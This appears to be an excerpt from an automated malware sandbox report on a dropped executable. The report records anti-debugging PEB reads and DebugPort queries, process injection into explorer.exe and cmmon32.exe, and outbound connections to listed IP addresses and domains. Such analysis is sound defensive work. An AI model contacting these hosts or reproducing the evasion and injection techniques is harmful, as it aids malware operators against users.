Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 1_2_0042013E mov eax, dword ptr fs:[00000030h] 1_2_0042013E
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A220A0 mov eax, dword ptr fs:[00000030h] 3_2_00A220A0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A390AF mov eax, dword ptr fs:[00000030h] 3_2_00A390AF
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A2F0BF mov ecx, dword ptr fs:[00000030h] 3_2_00A2F0BF
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A2F0BF mov eax, dword ptr fs:[00000030h] 3_2_00A2F0BF
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009F9080 mov eax, dword ptr fs:[00000030h] 3_2_009F9080
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A73884 mov eax, dword ptr fs:[00000030h] 3_2_00A73884
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1B8E4 mov eax, dword ptr fs:[00000030h] 3_2_00A1B8E4
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009F58EC mov eax, dword ptr fs:[00000030h] 3_2_009F58EC
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A8B8D0 mov eax, dword ptr fs:[00000030h] 3_2_00A8B8D0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A8B8D0 mov ecx, dword ptr fs:[00000030h] 3_2_00A8B8D0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009F40E1 mov eax, dword ptr fs:[00000030h] 3_2_009F40E1
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A0B02A mov eax, dword ptr fs:[00000030h] 3_2_00A0B02A
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A2002D mov eax, dword ptr fs:[00000030h] 3_2_00A2002D
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1A830 mov eax, dword ptr fs:[00000030h] 3_2_00A1A830
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A77016 mov eax, dword ptr fs:[00000030h] 3_2_00A77016
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AC4015 mov eax, dword ptr fs:[00000030h] 3_2_00AC4015
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB2073 mov eax, dword ptr fs:[00000030h] 3_2_00AB2073
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AC1074 mov eax, dword ptr fs:[00000030h] 3_2_00AC1074
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A10050 mov eax, dword ptr fs:[00000030h] 3_2_00A10050
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A769A6 mov eax, dword ptr fs:[00000030h] 3_2_00A769A6
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A261A0 mov eax, dword ptr fs:[00000030h] 3_2_00A261A0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB49A4 mov eax, dword ptr fs:[00000030h] 3_2_00AB49A4
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A751BE mov eax, dword ptr fs:[00000030h] 3_2_00A751BE
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A199BF mov ecx, dword ptr fs:[00000030h] 3_2_00A199BF
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A199BF mov eax, dword ptr fs:[00000030h] 3_2_00A199BF
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1C182 mov eax, dword ptr fs:[00000030h] 3_2_00A1C182
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A2A185 mov eax, dword ptr fs:[00000030h] 3_2_00A2A185
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A22990 mov eax, dword ptr fs:[00000030h] 3_2_00A22990
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A841E8 mov eax, dword ptr fs:[00000030h] 3_2_00A841E8
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009FB1E1 mov eax, dword ptr fs:[00000030h] 3_2_009FB1E1
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A14120 mov eax, dword ptr fs:[00000030h] 3_2_00A14120
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A14120 mov ecx, dword ptr fs:[00000030h] 3_2_00A14120
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A2513A mov eax, dword ptr fs:[00000030h] 3_2_00A2513A
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009F9100 mov eax, dword ptr fs:[00000030h] 3_2_009F9100
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1B944 mov eax, dword ptr fs:[00000030h] 3_2_00A1B944
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009FB171 mov eax, dword ptr fs:[00000030h] 3_2_009FB171
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009FC962 mov eax, dword ptr fs:[00000030h] 3_2_009FC962
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A0AAB0 mov eax, dword ptr fs:[00000030h] 3_2_00A0AAB0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A2FAB0 mov eax, dword ptr fs:[00000030h] 3_2_00A2FAB0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A2D294 mov eax, dword ptr fs:[00000030h] 3_2_00A2D294
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009F52A5 mov eax, dword ptr fs:[00000030h] 3_2_009F52A5
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB4AEF mov eax, dword ptr fs:[00000030h] 3_2_00AB4AEF
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A22AE4 mov eax, dword ptr fs:[00000030h] 3_2_00A22AE4
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A22ACB mov eax, dword ptr fs:[00000030h] 3_2_00A22ACB
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1A229 mov eax, dword ptr fs:[00000030h] 3_2_00A1A229
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009FAA16 mov eax, dword ptr fs:[00000030h] 3_2_009FAA16
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A34A2C mov eax, dword ptr fs:[00000030h] 3_2_00A34A2C
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009F5210 mov eax, dword ptr fs:[00000030h] 3_2_009F5210
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009F5210 mov ecx, dword ptr fs:[00000030h] 3_2_009F5210
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1B236 mov eax, dword ptr fs:[00000030h] 3_2_00A1B236
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A08A0A mov eax, dword ptr fs:[00000030h] 3_2_00A08A0A
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A13A1C mov eax, dword ptr fs:[00000030h] 3_2_00A13A1C
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00ABAA16 mov eax, dword ptr fs:[00000030h] 3_2_00ABAA16
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AAB260 mov eax, dword ptr fs:[00000030h] 3_2_00AAB260
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AC8A62 mov eax, dword ptr fs:[00000030h] 3_2_00AC8A62
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A3927A mov eax, dword ptr fs:[00000030h] 3_2_00A3927A
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009F9240 mov eax, dword ptr fs:[00000030h] 3_2_009F9240
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00ABEA55 mov eax, dword ptr fs:[00000030h] 3_2_00ABEA55
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A84257 mov eax, dword ptr fs:[00000030h] 3_2_00A84257
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AC5BA5 mov eax, dword ptr fs:[00000030h] 3_2_00AC5BA5
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A24BAD mov eax, dword ptr fs:[00000030h] 3_2_00A24BAD
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB138A mov eax, dword ptr fs:[00000030h] 3_2_00AB138A
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A2138B mov eax, dword ptr fs:[00000030h] 3_2_00A2138B
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AAD380 mov ecx, dword ptr fs:[00000030h] 3_2_00AAD380
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A01B8F mov eax, dword ptr fs:[00000030h] 3_2_00A01B8F
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A2B390 mov eax, dword ptr fs:[00000030h] 3_2_00A2B390
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A22397 mov eax, dword ptr fs:[00000030h] 3_2_00A22397
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A203E2 mov eax, dword ptr fs:[00000030h] 3_2_00A203E2
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1DBE9 mov eax, dword ptr fs:[00000030h] 3_2_00A1DBE9
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AA23E3 mov ecx, dword ptr fs:[00000030h] 3_2_00AA23E3
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AA23E3 mov eax, dword ptr fs:[00000030h] 3_2_00AA23E3
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A753CA mov eax, dword ptr fs:[00000030h] 3_2_00A753CA
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h] 3_2_00A1A309
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB131B mov eax, dword ptr fs:[00000030h] 3_2_00AB131B
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009FF358 mov eax, dword ptr fs:[00000030h] 3_2_009FF358
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A23B7A mov eax, dword ptr fs:[00000030h] 3_2_00A23B7A
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009FDB40 mov eax, dword ptr fs:[00000030h] 3_2_009FDB40
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AC8B58 mov eax, dword ptr fs:[00000030h] 3_2_00AC8B58
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009FDB60 mov ecx, dword ptr fs:[00000030h] 3_2_009FDB60
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A0849B mov eax, dword ptr fs:[00000030h] 3_2_00A0849B
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB4496 mov eax, dword ptr fs:[00000030h] 3_2_00AB4496
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB14FB mov eax, dword ptr fs:[00000030h] 3_2_00AB14FB
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A76CF0 mov eax, dword ptr fs:[00000030h] 3_2_00A76CF0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AC8CD6 mov eax, dword ptr fs:[00000030h] 3_2_00AC8CD6
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A2BC2C mov eax, dword ptr fs:[00000030h] 3_2_00A2BC2C
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AC740D mov eax, dword ptr fs:[00000030h] 3_2_00AC740D
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AB1C06
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A76C0A mov eax, dword ptr fs:[00000030h] 3_2_00A76C0A
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1746D mov eax, dword ptr fs:[00000030h] 3_2_00A1746D
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1B477 mov eax, dword ptr fs:[00000030h] 3_2_00A1B477
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A2AC7B mov eax, dword ptr fs:[00000030h] 3_2_00A2AC7B
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A2A44B mov eax, dword ptr fs:[00000030h] 3_2_00A2A44B
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A8C450 mov eax, dword ptr fs:[00000030h] 3_2_00A8C450
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AC05AC mov eax, dword ptr fs:[00000030h] 3_2_00AC05AC
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A235A1 mov eax, dword ptr fs:[00000030h] 3_2_00A235A1
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009F2D8A mov eax, dword ptr fs:[00000030h] 3_2_009F2D8A
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A21DB5 mov eax, dword ptr fs:[00000030h] 3_2_00A21DB5
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A22581 mov eax, dword ptr fs:[00000030h] 3_2_00A22581
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB2D82 mov eax, dword ptr fs:[00000030h] 3_2_00AB2D82
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A2FD9B mov eax, dword ptr fs:[00000030h] 3_2_00A2FD9B
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A0D5E0 mov eax, dword ptr fs:[00000030h] 3_2_00A0D5E0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00ABFDE2 mov eax, dword ptr fs:[00000030h] 3_2_00ABFDE2
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AA8DF1 mov eax, dword ptr fs:[00000030h] 3_2_00AA8DF1
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A76DC9 mov eax, dword ptr fs:[00000030h] 3_2_00A76DC9
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A76DC9 mov ecx, dword ptr fs:[00000030h] 3_2_00A76DC9
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A7A537 mov eax, dword ptr fs:[00000030h] 3_2_00A7A537
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00ABE539 mov eax, dword ptr fs:[00000030h] 3_2_00ABE539
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A03D34 mov eax, dword ptr fs:[00000030h] 3_2_00A03D34
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AC8D34 mov eax, dword ptr fs:[00000030h] 3_2_00AC8D34
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A24D3B mov eax, dword ptr fs:[00000030h] 3_2_00A24D3B
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009FAD30 mov eax, dword ptr fs:[00000030h] 3_2_009FAD30
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1C577 mov eax, dword ptr fs:[00000030h] 3_2_00A1C577
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A33D43 mov eax, dword ptr fs:[00000030h] 3_2_00A33D43
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A73540 mov eax, dword ptr fs:[00000030h] 3_2_00A73540
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AA3D40 mov eax, dword ptr fs:[00000030h] 3_2_00AA3D40
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A17D50 mov eax, dword ptr fs:[00000030h] 3_2_00A17D50
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A746A7 mov eax, dword ptr fs:[00000030h] 3_2_00A746A7
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AC0EA5 mov eax, dword ptr fs:[00000030h] 3_2_00AC0EA5
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A8FE87 mov eax, dword ptr fs:[00000030h] 3_2_00A8FE87
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A216E0 mov ecx, dword ptr fs:[00000030h] 3_2_00A216E0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A076E2 mov eax, dword ptr fs:[00000030h] 3_2_00A076E2
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A38EC7 mov eax, dword ptr fs:[00000030h] 3_2_00A38EC7
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AAFEC0 mov eax, dword ptr fs:[00000030h] 3_2_00AAFEC0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A236CC mov eax, dword ptr fs:[00000030h] 3_2_00A236CC
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AC8ED6 mov eax, dword ptr fs:[00000030h] 3_2_00AC8ED6
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AAFE3F mov eax, dword ptr fs:[00000030h] 3_2_00AAFE3F
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009FC600 mov eax, dword ptr fs:[00000030h] 3_2_009FC600
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A28E00 mov eax, dword ptr fs:[00000030h] 3_2_00A28E00
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB1608 mov eax, dword ptr fs:[00000030h] 3_2_00AB1608
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A2A61C mov eax, dword ptr fs:[00000030h] 3_2_00A2A61C
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009FE620 mov eax, dword ptr fs:[00000030h] 3_2_009FE620
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A0766D mov eax, dword ptr fs:[00000030h] 3_2_00A0766D
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1AE73 mov eax, dword ptr fs:[00000030h] 3_2_00A1AE73
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A07E41 mov eax, dword ptr fs:[00000030h] 3_2_00A07E41
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00ABAE44 mov eax, dword ptr fs:[00000030h] 3_2_00ABAE44
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A77794 mov eax, dword ptr fs:[00000030h] 3_2_00A77794
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A08794 mov eax, dword ptr fs:[00000030h] 3_2_00A08794
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A337F5 mov eax, dword ptr fs:[00000030h] 3_2_00A337F5
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A2E730 mov eax, dword ptr fs:[00000030h] 3_2_00A2E730
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1B73D mov eax, dword ptr fs:[00000030h] 3_2_00A1B73D
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AC070D mov eax, dword ptr fs:[00000030h] 3_2_00AC070D
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A2A70E mov eax, dword ptr fs:[00000030h] 3_2_00A2A70E
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009F4F2E mov eax, dword ptr fs:[00000030h] 3_2_009F4F2E
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1F716 mov eax, dword ptr fs:[00000030h] 3_2_00A1F716
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A8FF10 mov eax, dword ptr fs:[00000030h] 3_2_00A8FF10
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A0FF60 mov eax, dword ptr fs:[00000030h] 3_2_00A0FF60
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AC8F6A mov eax, dword ptr fs:[00000030h] 3_2_00AC8F6A
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A0EF40 mov eax, dword ptr fs:[00000030h] 3_2_00A0EF40
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_0457C450 mov eax, dword ptr fs:[00000030h] 5_2_0457C450
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_0451A44B mov eax, dword ptr fs:[00000030h] 5_2_0451A44B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_0451AC7B mov eax, dword ptr fs:[00000030h] 5_2_0451AC7B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_0450746D mov eax, dword ptr fs:[00000030h] 5_2_0450746D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045B740D mov eax, dword ptr fs:[00000030h] 5_2_045B740D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045A1C06 mov eax, dword ptr fs:[00000030h] 5_2_045A1C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04566C0A mov eax, dword ptr fs:[00000030h] 5_2_04566C0A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_0451BC2C mov eax, dword ptr fs:[00000030h] 5_2_0451BC2C
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045B8CD6 mov eax, dword ptr fs:[00000030h] 5_2_045B8CD6
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045A14FB mov eax, dword ptr fs:[00000030h] 5_2_045A14FB
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04566CF0 mov eax, dword ptr fs:[00000030h] 5_2_04566CF0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045A4496 mov eax, dword ptr fs:[00000030h] 5_2_045A4496
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_044F849B mov eax, dword ptr fs:[00000030h] 5_2_044F849B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04507D50 mov eax, dword ptr fs:[00000030h] 5_2_04507D50
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04523D43 mov eax, dword ptr fs:[00000030h] 5_2_04523D43
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04563540 mov eax, dword ptr fs:[00000030h] 5_2_04563540
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04593D40 mov eax, dword ptr fs:[00000030h] 5_2_04593D40
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_0450C577 mov eax, dword ptr fs:[00000030h] 5_2_0450C577
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_0456A537 mov eax, dword ptr fs:[00000030h] 5_2_0456A537
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045AE539 mov eax, dword ptr fs:[00000030h] 5_2_045AE539
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04514D3B mov eax, dword ptr fs:[00000030h] 5_2_04514D3B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045B8D34 mov eax, dword ptr fs:[00000030h] 5_2_045B8D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_044F3D34 mov eax, dword ptr fs:[00000030h] 5_2_044F3D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_044EAD30 mov eax, dword ptr fs:[00000030h] 5_2_044EAD30
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04566DC9 mov eax, dword ptr fs:[00000030h] 5_2_04566DC9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04566DC9 mov ecx, dword ptr fs:[00000030h] 5_2_04566DC9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04598DF1 mov eax, dword ptr fs:[00000030h] 5_2_04598DF1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_044FD5E0 mov eax, dword ptr fs:[00000030h] 5_2_044FD5E0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045AFDE2 mov eax, dword ptr fs:[00000030h] 5_2_045AFDE2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_044E2D8A mov eax, dword ptr fs:[00000030h] 5_2_044E2D8A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_0451FD9B mov eax, dword ptr fs:[00000030h] 5_2_0451FD9B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04512581 mov eax, dword ptr fs:[00000030h] 5_2_04512581
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\cmmon32.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_0040CF43 LdrLoadDll, 3_2_0040CF43

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe Network Connect: 198.46.160.97 80
Source: C:\Windows\explorer.exe Domain query: www.denko-kosan.com
Source: C:\Windows\explorer.exe Domain query: www.traindic.top
Source: C:\Windows\explorer.exe Network Connect: 1.13.186.125 80
Source: C:\Windows\explorer.exe Network Connect: 219.94.129.181 80
Source: C:\Windows\explorer.exe Network Connect: 162.0.231.77 80
Source: C:\Windows\explorer.exe Network Connect: 67.222.24.48 80
Source: C:\Windows\explorer.exe Network Connect: 49.212.180.95 80
Source: C:\Windows\explorer.exe Domain query: www.bohndigitaltech.com
Source: C:\Windows\explorer.exe Domain query: www.0dhy.xyz
Source: C:\Windows\explorer.exe Domain query: www.yongleproducts.com
Source: C:\Windows\explorer.exe Network Connect: 162.241.24.110 80
Source: C:\Windows\explorer.exe Domain query: www.rifleroofers.com
Source: C:\Windows\explorer.exe Domain query: www.kunimi.org
Source: C:\Windows\explorer.exe Domain query: www.amirah.cfd
Source: C:\Windows\explorer.exe Domain query: www.bisarropainting.com
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Section unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: D0000
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Section loaded: unknown target: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\cmmon32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
